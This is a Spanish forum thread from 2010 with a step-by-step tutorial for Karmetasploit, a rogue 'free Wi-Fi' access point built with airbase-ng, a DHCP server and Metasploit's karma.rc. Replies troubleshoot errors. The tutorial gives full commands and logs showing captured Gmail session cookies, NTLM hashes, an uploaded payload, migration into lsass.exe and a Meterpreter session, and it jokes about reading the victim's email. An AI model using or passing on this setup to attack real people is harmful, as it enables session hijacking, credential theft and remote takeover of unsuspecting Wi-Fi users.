[Metasploit] Karmetasploit

Iniciado por Shell Root, 6 Enero 2010, 02:14 AM

0 Miembros y 4 Visitantes están viendo este tema.

Shell Root

KARMETASPLOIT

   Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes. Resumiendo: Karmetasploit es una pasada.

CONFIGURACIÓN

   Se necesita una pequeña instalación para poner en marcha Karmetasploit, el primer paso es obterner el plugin para nuestro Metasploit Framework.

wget http://metasploit.com/users/hdm/tools/karma.rc

   Una vez descagado, necesitamos configurar un poco la infraestructura que necesitaremos. Cuando los cientes se conecten al AP falso que tenemos, estarán esperando que se les asigne una IP, por eso necesitamos un pequeño servidor DHCP, así que vamos a instalar dhcpd3-server y a configurarlo.


sudo apt-get install dhcpd3-server
sudo gedit /etc/dhcp3/dhcpd.conf

y lo dejamos así:


option domain-name-servers 10.0.0.1;

default-lease-time 60;
max-lease-time 72;

ddns-update-style none;

authoritative;

log-facility local7;

subnet 10.0.0.0 netmask 255.255.255.0 {
 range 10.0.0.100 10.0.0.254;
 option routers 10.0.0.1;
 option domain-name-servers 10.0.0.1;
}


   También necesitaremos instalar un par de cositas más.

sudo gem install activerecord sqlite3-ruby

   Ahora estamos preparados para empezar.

EMPEZANDO

   Primero, vamos a poner nuestra tarjeta wireless en modo monitor


root@trashhgoo:/home/trashhgoo/Hacklab# airmon-ng start wlan0


Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
878 avahi-daemon
879 avahi-daemon
1012 NetworkManager
1041 wpa_supplicant


Interface Chipset Driver

eth1 Unknown wl
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)

root@trashhgoo:/home/trashhgoo/Hacklab#


Como sabréis, airmon-ng nos crea un dispositivo virtual en modo monitor, en este caso mon0, y es sobre el que vamos a levantar el AP.


root@trashhgoo:/home/trashhgoo/Hacklab# airbase-ng -P -C 30 -e "WIFI_GRATUITO" -v mon0
23:39:19  Created tap interface at0
23:39:19  Trying to set MTU on at0 to 1500
23:39:19  Trying to set MTU on mon0 to 1800
23:39:19  Access Point with BSSID 00:24:01:12:3E:A6 started.


Esto nos creó una interfaz nueva, que está trabajando como AP, en mi caso: at0

¿Qué hacemos ahora? Asignarle una IP y arrancar el servidor DHCP (Asignador de IP's automáticas, para el que no lo sepa) en él, así que abrimos otro shell, dejando el airbase-ng trabajando.


root@trashhgoo:/home/trashhgoo# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
root@trashhgoo:/home/trashhgoo# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.2
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 1 leases to leases file.
Listening on LPF/at0/00:24:01:12:3e:a6/10.0.0/24
Sending on   LPF/at0/00:24:01:12:3e:a6/10.0.0/24
Sending on   Socket/fallback/fallback-net
Can't create PID file /var/run/dhcpd.pid: Permission denied.


No le hagáis caso al "Permission denied", es sólo que no pudo crear un archivo (Este dhcpd3 es un protestón).

Pues ya está funcionando! Qué os parece? No es maravilloso?

No?

Bueno, pues entonces vamos a seguir, que hasta ahora sólo lo estábamos preparando.

UTILIZANDO KARMETASPLOIT

Si utilizáis metasploit 3.2, tenéis que guardar karma.rb en la carpeta donde está msfconsole, si usáis la 3.3, tenéis que estar en la carpeta donde lo tenéis guardado o asignar la carpeta donde lo tenemos guardado.


root@trashhgoo:/home/trashhgoo# cd Hacklab
root@trashhgoo:/home/trashhgoo/Hacklab# ls karma.rc
karma.rc


Lo tenéis? Pues vamos a poner en marcha el chiringuito con un sencillo comando.

msfconsole -r karma.rc

También podría haber puesto msfconsole -r /home/trashhgoo/Hacklab/karma.rc
Y hala! A bailar! Ahora el propio msfconole es el que hará todo!
Empezará a levantar servers, que no son más que trampas para los incautos que se conecten a nuestro AP. Cuando parezca que se para, pulsemos ENTER.


[*] Started reverse handler on port 3333
[*] Starting the payload handler...
[*] Started reverse handler on port 6666

[*] --- Done, found 14 exploit modules

[*] Using URL: http://0.0.0.0:55550/ads
[*]  Local IP: http://77.209.92.221:55550/ads
[*] Server started.

msf auxiliary(http) >


No os hacéis a una idea de la cantidad de exploits que tenemos cargados, a la espera de que algún incauto pique.

Y qué pasa si pican? Pues lo veremos ahora...

PICARON!!!!


[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.msn.com)
[*] HTTP REQUEST 10.0.0.100 > www.msn.com:80 GET / Windows IE 5.01 cookies=MC1=V=3&GUID=e2eabc69be554e3587acce84901a53d3;
MUID=E7E065776DBC40099851B16A38DB8275; mh=MSFT; CULTURE=EN-US; zip=z:68101|la:41.26|lo:-96.013|c:US|hr:1; FlightGroupId=14; FlightId=BasePage;
hpsvr=M:5|F:5|T:5|E:5|D:blu|W:F; hpcli=W.H|L.|S.|R.|U.L|C.|H.; ushpwea=wc:USNE0363; wpv=2
[*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
[*] DNS 10.0.0.100:1279 XID 88 (IN::A adwords.google.com)
[*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
[*] DNS 10.0.0.100:1280 XID 89 (IN::A blogger.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1289 XID 95 (IN::A gmail.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] Request '/ads' from 10.0.0.100:1278
[*] Recording detection from User-Agent
[*] DNS 10.0.0.100:1292 XID 96 (IN::A gmail.google.com)
[*] Browser claims to be MSIE 5.01, running on Windows 2000
[*] DNS 10.0.0.100:1293 XID 97 (IN::A google.com)
[*] Error: SQLite3::SQLException cannot start a transaction within a transaction /usr/lib/ruby/1.8/sqlite3/errors.rb:62:in
`check'/usr/lib/ruby/1.8/sqlite3/ resultset.rb:47:in `check'/usr/lib/ruby/1.8/sqlite3/resultset.rb:39:in `commence'/usr/lib/ruby
1.8/sqlite3
[*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gather.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gmail.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-
gcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
[*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY
zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8


Vale, vale, vale... Un momento! Vamos a ver! Qué es todo esto?

Bien, todo esto son los datos que nos está enviando nuestra pesca, y algo interesante es por ejemplo ese par de cookies que nos acaban de regalar.


[*] HTTP REQUEST 10.0.0.100 > gmail.google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY
zgcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8
[*] HTTP REQUEST 10.0.0.100 > google.com:80 GET /forms.html Windows IE 5.01 cookies=PREF=ID=474686c582f13be6:U=ecaec12d78faa1ba:TM=1241334857:LM=1241334880:S=snePRUjY-
gcXpEV; NID=22=nFGYMj-l7FaT7qz3zwXjen9_miz8RDn_rA-
lP_IbBocsb3m4eFCH6hI1ae23ghwenHaEGltA5hiZbjA2gk8i7m8u9Za718IFyaDEJRw0Ip1sT8uHHsJGTYfpAlne1vB8


SON PARA GMAIL!! Pues ya podemos acceder a su correo (Risa malévola, sonido de órgano y llamas infernales saliendo del suelo iluminando una sonrisa malvada).

Y aparte de esas pueden aparecernos muchas más, pero... Qué más puede pasar? Pues puede pasar que la pesca sea vulnerable a algún ataque, por lo que obtendríamos lo siguiente:



[*] Received 10.0.0.100:1362 TARGET\P0WN3D LMHASH:47a8cfba21d8473f9cc1674cedeba0fa6dc1c2a4dd904b72 NTHASH:ea389b305cd095d32124597122324fc470ae8d9205bdfc19 OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] HTTP REQUEST 10.0.0.100 > www.myspace.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Connecting to the ADMIN$ share...
[*] HTTP REQUEST 10.0.0.100 > www.plaxo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Regenerating the payload...
[*] Uploading payload...
[*] HTTP REQUEST 10.0.0.100 > www.ryze.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Created UxsjordQ.exe...
[*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Connecting to the Service Control Manager...
[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.gather.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 5.01 cookies=
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Removing the service...
[*] Closing service handle...
[*] Deleting UxsjordQ.exe...
[*] Sending Access Denied to 10.0.0.100:1362 TARGET\P0WN3D
[*] Received 10.0.0.100:1362 LMHASH:00 NTHASH: OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Sending Access Denied to 10.0.0.100:1362
[*] Received 10.0.0.100:1365 TARGET\P0WN3D LMHASH:3cd170ac4f807291a1b90da20bb8eb228cf50aaf5373897d NTHASH:ddb2b9bed56faf557b1a35d3687fc2c8760a5b45f1d1f4cd OS:Windows 2000 2195 LM:Windows 2000 5.0
[*] Authenticating to 10.0.0.100 as TARGET\P0WN3D...
[*] AUTHENTICATED as TARGETP0WN3D...
[*] Ignoring request from 10.0.0.100, attack already in progress.
[*] Sending Access Denied to 10.0.0.100:1365 TARGET\P0WN3D
[*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.0.0.100:1278...
[*] Sending stage (2650 bytes)
[*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.0.0.100:1367...
[*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 5.01 cookies=
[*] Sleeping before handling stage...
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET / Windows IE 5.01 cookies=
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Migrating to lsass.exe...
[*] Current server process: rundll32.exe (848)
[*] New server process: lsass.exe (232)
[*] Meterpreter session 1 opened (10.0.0.1:45017 -> 10.0.0.100:1364)

msf auxiliary(http) > sessions -l

Active sessions
===============

 Id  Description  Tunnel                            
 --  -----------  ------                            
 1   Meterpreter  10.0.0.1:45017 -> 10.0.0.100:1364



Oh! Una sesión de meterpreter! Y sin hacer nada! No es estupendo? No, es Karmetasploit.


Fuente: Not Spam http://foro.portalhacker.net/index.php/topic,100592.0.html


Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

TeCh

Jajaja! Muy buen truco master! Te felicito! :D

Aunque tambien se podria hacer un MITM de paso! ;)

trashhgoo

Cita de: TeCh en  6 Enero 2010, 14:17 PM
Jajaja! Muy buen truco master! Te felicito! :D

Master? Oish, gracias. =P

d_pit

#3
podriamos hacer esto desde WIN? dentro de los receptores wifi q se pueden poner en modo monitor ...
cd /pentes/exploits/..

trashhgoo

Cita de: d_pit en  7 Enero 2010, 17:03 PM
podriamos hacer esto desde WIN? dentro de los receptores wifi q se pueden poner en modo monitor ...

Lo dudo, no sé cómo puedes configurar el servidor DHCP3 en Windows. Sorry

pepeluxx

Gracias por el aporte. La verdad es que esto tiene más peligro ... jaja

Bueno, el caso es que me da un error al conectar el cliente y no so como solucionarlo. Parece un error de DNS al asignar los datos el servidor DHCP. Alguna sugerencia? gracias


[-] fakedns: Resolv::DNS::DecodeError non-backward name pointer ["/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1423:in `get_labels'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1427:in `get_labels'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1409:in `get_name'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1668:in `decode_rdata'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1451:in `block in get_rr'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1355:in `get_length16'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1451:in `get_rr'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1332:in `block (2 levels) in decode'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1331:in `each'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1331:in `block in decode'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1348:in `initialize'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1312:in `new'", "/opt/metasploit3/lib/ruby/1.9.1/resolv.rb:1312:in `decode'", "(eval):99:in `run'", "/opt/metasploit3/msf3/lib/msf/base/simple/auxiliary.rb:93:in `job_run_proc'", "/opt/metasploit3/msf3/lib/msf/base/simple/auxiliary.rb:69:in `block in run_simple'", "/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `call'", "/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `block in start'"]

trashhgoo

Configuraste correctamente el servidor DHCP3? Ejecutas MSF con privilegios de Root?

pepeluxx

Si, ejecuto la consola de metasploit con root y el dhcp está corriendo bien:


debian:~# ps -ef |grep dhcpd
root     11476     1  0 17:04 ?        00:00:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root     12043  5044  0 20:09 pts/2    00:00:00 grep dhcpd


Lo que si que tengo es una duda con el dhcp-server. El caso es que tengo en el portátil dos wifis, una conectada a Internet y la otra, que es la que pongo en modo monitor.
Antes de poner la segunda en modo monitor, el dhcpd ya está corriendo, por lo que me da el siguiente mensaje:


debian:~# airmon-ng start wlan1

Found 6 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
1730 avahi-daemon
1731 avahi-daemon
2361 wpa_supplicant
10715 NetworkManager
10749 wpa_supplicant
10783 dhclient3
Process with PID 10749 (wpa_supplicant) is running on interface wlan0
Process with PID 10783 (dhclient3) is running on interface wlan0

Interface Chipset Driver

wlan0 Unknown iwlagn - [phy0]
wlan1 ZyDAS 1211 zd1211rw - [phy2]
(monitor mode enabled on mon0)


El mensaje me refiero a:

Process with PID 10783 (dhclient3) is running on interface wlan0


También he probado a parar el demonio y luego arrancarlo desde el otro interface:

debian:~# /etc/init.d/dhcp3-server stop

debian:~# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

debian:~# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/at0/00:02:72:63:6f:db/10.0.0/24
Sending on   LPF/at0/00:02:72:63:6f:db/10.0.0/24
Sending on   Socket/fallback/fallback-net

debian:~# ps -ef | grep dhcpd
root     12701     1  0 20:14 ?        00:00:00 dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
root     12703  3110  0 20:15 pts/1    00:00:00 grep dhcpd
debian:/home/pepelux/aircrack#


Pero tampoco va y el mensaje de la consola me da que pensar que igual me falta por instalar algún script para las DNSs ...

Gracias

trashhgoo

Pues la verdad es que no termino de entender el error, pero a ver si llegamos a una solución para añadirla en el manual, como posibles errores.

En un principio te diria que hicieras su msfupdate.

El caso es que cuando lo hice por primera vez, me pidio que instalara un par de gems mas, y lo hice, pero no tome nota de ello, y no lo inclui en el manual. Sorry

pepeluxx

Tengo todos los plugins de metasploit actualizados. El problema creo que viene en el dhcpd

La wifi se arranca y me conecto desde otro PC pero no puedo navegar. Lo revisaré a ver ...